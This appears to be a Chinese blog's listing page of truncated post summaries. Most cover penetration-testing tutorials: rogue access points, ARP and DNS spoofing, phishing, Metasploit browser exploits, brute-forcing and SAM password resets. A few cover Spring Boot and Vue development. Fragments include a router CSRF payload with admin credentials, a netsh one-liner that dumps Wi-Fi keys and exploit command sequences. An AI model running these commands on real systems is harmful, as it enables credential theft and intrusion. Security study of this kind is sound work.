摘要:
语法、关键保留字及变量 标识符 1.区分大小写:text和Text是两种不同的标识符。 2.标识符组成开头:a(字母)、下划线_、或一个美元符号$ 3.其他字符可以是字母、下划线、美元符号或数字 4.不能把关键字、保留字、true、false、和null作为标识符 例如:myName、book123 阅读全文
摘要:
1、无线网卡 2、KaliLinux操作系统,这里就不用说了,必备的 3、isc-dhcp-server服务器。安装好KaliLinux后只需要apt-get update 然后apt-get install isc-dhcp-server即可 4、Aircrack-ng套件 #用来发送数据 5、s 阅读全文
摘要:
建立热点 工具:isc-dhcp-server ;Aircrack-ng套件;iptables 建立过程: 首先写dhcp配置文件/etc/dhcp/dhcpd.conf 写入如下内容: 这里以10.0.0.1作为网关和dns服务器地址。 然后我们处理无线网卡 上述命令可以防止出现:Error: G 阅读全文
摘要:
官网:https://www.wireshark.org/download.html 阅读全文
摘要:
Windows 1.判断什么端口能出来 有时候有防火墙,你也不知道哪个端口能出来,你只有SHELL,咋判断什么端口能出来呢?如果你是在WIN VISTA以下版本,那么用下面的命令可以啦 用TELNET不停的连接你的1-65535端口,你本地开个TCPDUMP就行了,如果连通了,就OK了.如果TCP封 阅读全文
摘要:
攻击者进行网络钓鱼的方式常有以下几种: 1. 通过修改受害者hosts文件(C:\WINDOWS\system32\drivers\etc\hosts)来实现; 2. 通过修改受害者dns来实现; 3. 已经进入路由器,直接修改路由器的DNS。 罗列的并不全,之后遇到的话再补充,上述三种方式很常见。 阅读全文
摘要:
server.py下载地址 https://github.com/breenmachine/dnsftp client.sh脚本 阅读全文
摘要:
nslookup -qt=txt mail._domainkey.mail.vpgame.net 第一个mail 是上面所说的邮件域的selector,_domainkey 是固定格式(DKIM就是基于domainkeys的技术发展而来), mail.vpgame.net 是邮件域 Linux: d 阅读全文
摘要:
–from <要显示的发件人邮箱> –ehlo <伪造的邮件ehlo头> –body <邮件正文> –header <邮件头信息,subject为邮件标题> 阅读全文
摘要:
写了一个style标签import一个css调用:document.writeln('<style type="text/css">@import url(http://admin:[email protected]/userRpm/LanDhcpServerRpm.htm?dhcpserver=1 阅读全文
摘要:
安装 apt-get install steghide steghide --help vim test.txt 输入 journeyIT 1. steghide embed -cf [图片文件载体] -ef [待隐藏文件] 2. [回车] 3. 输入密码,提取文件时用到,如果不想设密码,直接按回车 阅读全文
摘要:
使用交互模式的JSRat server: 访问 http://192.168.1.101:8080/wtf 获取攻击代码如下: 经过多次测试,成功将以上命令写入chm,其Html代码为: 编译以后运行,可以成功获取JS交互shell: 直接执行cmd /c command 是会有黑框的,可以使用ru 阅读全文
摘要:
Haka是一种开源的以网络安全为导向的语言,可以用于编写安全规则和协议剥离器。在这一部分中,我们的重点是编写安全规则。 官网:http://www.haka-security.org/ github:https://github.com/haka-security/haka 阅读全文
摘要:
1. 查看并启动启动apache服务 service apache2 status service apache2 start 2. 修改 /var/www/index.html 页面 vi /var/www/index.html 3. 修改 etter.dns 文件 格式为:劫持的域名 A 指向指 阅读全文
摘要:
Arpspoof -i 网卡 -t 目标IP 网关 Kali : 网卡eth0 目标ip :192.168.1.100 网关:192.168.1.1 替换掉: arpspoof -i eth0 -t 192.168.100 192.168.1.1 怎么看局域网当中的ip呢 Fping -asg 19 阅读全文
摘要:
1. use exploit/windows/browser/ms12_004_midi 2. show targets 3. info 4. set SRVHOST 【mine IP】 5. set SRVPORT 【80】 6. set URIPATH / 7. exploit -j 8. et 阅读全文
摘要:
1. 打开 The Social-Engineer Toolkit 也就是所谓set 2. 依次选择 Social-Engineering Attacks Website Attacks Vectors Java Applet Attack Method Site Cloner 翻一下:社会工程学攻 阅读全文
摘要:
search autopwn use server/browser_autopwn show options set LHOST set SRVPORT set URIPATH / show options 修改 etter.conf 文件 if you use ipchains if you us 阅读全文
摘要:
search mysql use scanner/mysql/mysql_login show options set RHOSTS set USER_FILE /root/username.lst set PASS_FILE /root/passwords.lst exploit mysql -h 阅读全文
摘要:
cd /mnt/windows/Windows/System32/config/ cd /mnt/windows/Windows/System32/config/ ls SAM chntpw -l SAM chntpw -u "username" SAM 1 - clear 阅读全文
摘要:
一、注释掉系统不需要的用户和用户组 注意:不建议直接删除,当你需要某个用户时,自己重新添加会很麻烦。cp /etc/passwd /etc/passwdbak #修改之前先备份vi /etc/passwd #编辑用户,在前面加上#注释掉此行#adm:x:3:4:adm:/var/adm:/sbin/ 阅读全文
摘要:
mkdir -p /var/lib/pgsql/data //创建pgsql的数据库目录cd /var/lib/pgsql chown postgres.postgres data //改变目录的所属用户用组su postgres //切换到postgres,不然初始化不initdb /var/li 阅读全文
摘要:
一、安装 首先,安装PostgreSQL客户端。 sudo apt-get install postgresql-client 然后,安装PostgreSQL服务器。 sudo apt-get install postgresql 正常情况下,安装完成后,PostgreSQL服务器会自动在本机的54 阅读全文
摘要:
1、把U盘插入电脑;2、fdisk -l /dev/sda* (查询U盘设备如:sda1)3、mkdir /mnt/usb4、mount /dev/sda1 /mnt/usb5、ls /mnt/usb退出U盘:umount /mnt/usb 阅读全文
摘要:
在grub.conf中的kernel那行的后面,要在同一行,加上vga=ask,保存退出,启动时系统会问你需要什么分辨率的,有一大串选择。不同色彩和分辨率所对应的值depth 640x480 800x600 1024x768 1280x10248bit 769 771 773 77515bit 78 阅读全文
摘要:
系统是什么版本?cat /etc/issuecat /etc/*-releasecat /etc/lsb-releasecat /etc/redhat-release它的内核版本是什么?cat /proc/version uname -auname -mrsrpm -q kerneldmesg | 阅读全文
摘要:
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear 阅读全文
摘要:
一、新建一个maven项目,勾上mysql与mybatis 2、把pom.xml的自动生成的原插件替换以下 <!--原插件--> <plugins> <plugin> <groupId>org.springframework.boot</groupId> <artifactId>spring-boo 阅读全文
摘要:
首先你得下载ssh整合包,可以去官网下,也可以直接下载我上传的http://download.csdn.net/detail/h295928126/9777633 然后也给出这个基础项目的完整demo,不过希望的是你能自己动手搭建起来,因为写的很详细了,所以资源下载设置1分 http://downl 阅读全文
摘要:
最进在做网站的后台管理功能,需要能够对数据库的文章进行“增,删,改,查”,但是遇到了图片保存的问题,如果采用前端上传图片至后端,然后后端保存,数据库存储图片的相对路径,这种方式感觉有点麻烦,于是就在寻求更简单的解决方案,那么有没有一种前端上传图片存储,直接返回图片外链的解决方案呢? 最终,我选择 阅读全文
摘要:
Vue2.0+ElementUI+PageHelper实现的表格分页 前言 最近做了一些前端的项目,要对表格进行一些分页显示。表格分页的方法有很多,从宏观上来说分为物理分页和逻辑分页,由于逻辑分页(即前端分页)的做法是将数据全部缓存,然后分页显示,这样在数据量较大的时候会对浏览器的速度产生影响,所以 阅读全文
摘要:
前后端分离 Spring Booot + Vue 开发单页面应用 前言 需求: 最近本人在学习SpringBoot,希望自己能搭一个简单的Demo应用出来,但是搭到前端的时候遇到了困惑,因为网络上大部分教程前端都是应用模板引擎thymeleaf生成的,它给我的感觉就是一个进化版的JSP,但是很明显这 阅读全文
摘要:
这篇文章主要讲解使用eclipse对Spirng+SpringMVC+Maven+Mybatis+MySQL项目搭建过程,包括里面步骤和里面的配置文件如何配置等等都会详细说明。 1、创建表,并插入数据: CREATE TABLE `t_user` ( `USER_ID` int(11) NOT NU 阅读全文
摘要:
配置文件 pom包就不贴了比较简单该依赖的就依赖,主要是数据库这边的配置: mybatis.config-locations=classpath:mybatis/mybatis-config.xml spring.datasource.test1.driverClassName = com.mysq 阅读全文
摘要:
学习任务目标 用户必须要登陆之后才能访问定义链接,否则跳转到登录页面。 对链接进行权限控制,只有当当前登录用户有这个链接访问权限才可以访问,否则跳转到指定页面。 输入错误密码用户名或则用户被设置为静止登录,返回相应json串信息。 我是用的是之前搭建的一个springboot+mybatisplus 阅读全文